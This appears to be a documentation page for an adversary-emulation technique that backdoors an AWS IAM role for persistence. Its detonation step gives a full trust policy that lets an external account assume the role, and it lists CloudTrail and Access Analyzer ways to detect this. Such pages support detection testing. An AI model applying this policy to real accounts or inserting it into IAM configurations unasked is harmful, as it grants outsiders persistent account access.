Backdoor an IAM Role
idempotent
Platform: AWS
MITRE ATT&CK Tactics
- Persistence
Description
Establishes persistence by backdooring an existing IAM role, allowing it to be assumed from an external AWS account.
Warm-up:
- Create an IAM role.
Detonation:
- Update the assume role policy of the IAM role to backdoor it, making it accessible from an external, fictitious AWS account:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
},
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::193672423079:root"
},
"Action": "sts:AssumeRole"
}
]
}
Instructions
Detection
-
Using CloudTrail's
UpdateAssumeRolePolicy
event. -
Through IAM Access Analyzer, which generates a finding when a role can be assumed from a new AWS account or publicly.